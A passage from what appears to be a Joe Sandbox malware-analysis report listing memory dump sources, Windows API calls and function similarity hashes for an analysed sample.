                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1400400880-0
                                                                                                                        • Opcode ID: 168796f9be6af2e00a1e0c13e8481f7b6c1735c285c48e3457f2838ae12673e8
                                                                                                                        • Instruction ID: 9e62acca3ffd8af432368a2c5d68fbdb27d2d3598730482c6caa495fe8d037a2
                                                                                                                        • Opcode Fuzzy Hash: 168796f9be6af2e00a1e0c13e8481f7b6c1735c285c48e3457f2838ae12673e8
                                                                                                                        • Instruction Fuzzy Hash: 8E711570E082719ED7629B69FC41B5A7BE5EB55310FE4012FE090C72E2DB389986CB5C
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040F740: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104,?,0040F91B,00000001,?), ref: 0040F763
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0040F924
                                                                                                                        • CoCreateInstance.OLE32(0044EC20,00000000,00000001,0044EC10,?,00000001,?), ref: 0040F942
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0040F9F1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$CreateInitializeInstance
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2531819542-0
                                                                                                                        • Opcode ID: c68482eb7b128df90b140a767d1cb684c16c794c4bf690cbe2601dcd45de4953
                                                                                                                        • Instruction ID: d74481e86e668fc06052e60e2a5e486a87dd0838d2a97d2aabe5d75d40d84abb
                                                                                                                        • Opcode Fuzzy Hash: c68482eb7b128df90b140a767d1cb684c16c794c4bf690cbe2601dcd45de4953
                                                                                                                        • Instruction Fuzzy Hash: FC3119B5204341AFD724CFA0C888E6BB7A9FFC9700F14896DF9459B291D635EC44CB65
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?), ref: 00414F47
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414F81
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414FA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$Close$FileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3046750681-0
                                                                                                                        • Opcode ID: aa1ead43bb4c2f5695caeebe89723ce1faa210caa242d16a477e1f9ee516e382
                                                                                                                        • Instruction ID: c85bec187cc915339fe74b88054a561c9c391bf97f991d5b0ad1c1012243f531
                                                                                                                        • Opcode Fuzzy Hash: aa1ead43bb4c2f5695caeebe89723ce1faa210caa242d16a477e1f9ee516e382
                                                                                                                        • Instruction Fuzzy Hash: CF219070205201CBD7258F15C854BEBB7E9AFC6325F14866DE4098B3A0D339D843CB95
                                                                                                                        APIs
                                                                                                                        • LoadResource.KERNEL32(?,?), ref: 004013DC
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 004013EB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$LoadLock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1037334470-0
                                                                                                                        • Opcode ID: 6a70bf04cb826fafab710c17c709d5ed6c2866ee02fa4e431fdbd7f5c5722625
                                                                                                                        • Instruction ID: 4ddbe79ddf29716ed0e0787d15bd08c75ff9431ae36c8441fcffb4845dcff88c
                                                                                                                        • Opcode Fuzzy Hash: 6a70bf04cb826fafab710c17c709d5ed6c2866ee02fa4e431fdbd7f5c5722625
                                                                                                                        • Instruction Fuzzy Hash: 62F0C83770026147CB305F69EC448ABB7D8EAD27A7705083FFD91E3261D238D84496A8
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32 ref: 004228A6
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 004228B8
                                                                                                                        • GetACP.KERNEL32 ref: 004228E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4232894706-0
                                                                                                                        • Opcode ID: 9a9126b5ab44d53eca08d5a37bef252a87b9afc98746b44ef76eb446818d1b29
                                                                                                                        • Instruction ID: 479ae5959c9c7c33de479cf2c97852b65f57573494026bee3456946d9841ba59
                                                                                                                        • Opcode Fuzzy Hash: 9a9126b5ab44d53eca08d5a37bef252a87b9afc98746b44ef76eb446818d1b29
                                                                                                                        • Instruction Fuzzy Hash: 1EF0AF31E00234ABC715EBA0E8145EF77A4BB06B41B5142A9E95297250D7B4AE09C799
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4e1850cb4fc369c31007ded812cf3d6bfb65e1af0afcb55ba6117de7e84e2072
                                                                                                                        • Instruction ID: a4ee6ba57dd3c2eee595af29f84efc58c9f0a8231bf26c2dab4fe45ac8b8fa99
                                                                                                                        • Opcode Fuzzy Hash: 4e1850cb4fc369c31007ded812cf3d6bfb65e1af0afcb55ba6117de7e84e2072
                                                                                                                        • Instruction Fuzzy Hash: A7F03131310119BBCF059F61EE049AE7B6CAB01344B848426FD16D5121DBBCCA15DB5E
                                                                                                                        APIs
                                                                                                                        • GetVersionExA.KERNEL32(?), ref: 0042291C
                                                                                                                        • InterlockedExchange.KERNEL32(0045580C,Function_00022895), ref: 00422944
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExchangeInterlockedVersion
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2700998522-0
                                                                                                                        • Opcode ID: d51009fb6949f085d55bcad13a349f30658bd5cc0b6d4ae9d564e0fc4a49fac9
                                                                                                                        • Instruction ID: 88388f21cbd03abab0724f39be1b3b2730a59f37a07532d993b0e1a24bcad9ce
                                                                                                                        • Opcode Fuzzy Hash: d51009fb6949f085d55bcad13a349f30658bd5cc0b6d4ae9d564e0fc4a49fac9
                                                                                                                        • Instruction Fuzzy Hash: 9AF03774600324EBC720AF64EA0975DB7F4FB06305F9041F6E40992352DB748D888F19
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(0040B718,?), ref: 00413813
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00413828
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        • Opcode ID: fddb500a4fd55824f664e50f501a9d257236d6138bad59b67ceea46b7ef6f083
                                                                                                                        • Instruction ID: 4b0baa7c04ff5837cf594f603c76cd3553f5a9d2e9049aea6c7cfb4a64392fa4
                                                                                                                        • Opcode Fuzzy Hash: fddb500a4fd55824f664e50f501a9d257236d6138bad59b67ceea46b7ef6f083
                                                                                                                        • Instruction Fuzzy Hash: D6E0C2B94442402BC200EF35D948AEB77D95B52722F049A1AFCA8822E0D23D984DDA2A
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414353
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414368
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        • Opcode ID: 19d72f97b7d99f620658749f6876cd35770fc52d9dde7e14b69d7df5d49c560f
                                                                                                                        • Instruction ID: d18f64121f5c3201ee76a233fb6b76ca38dcc0ed17e5b9cd94885203bfb14983
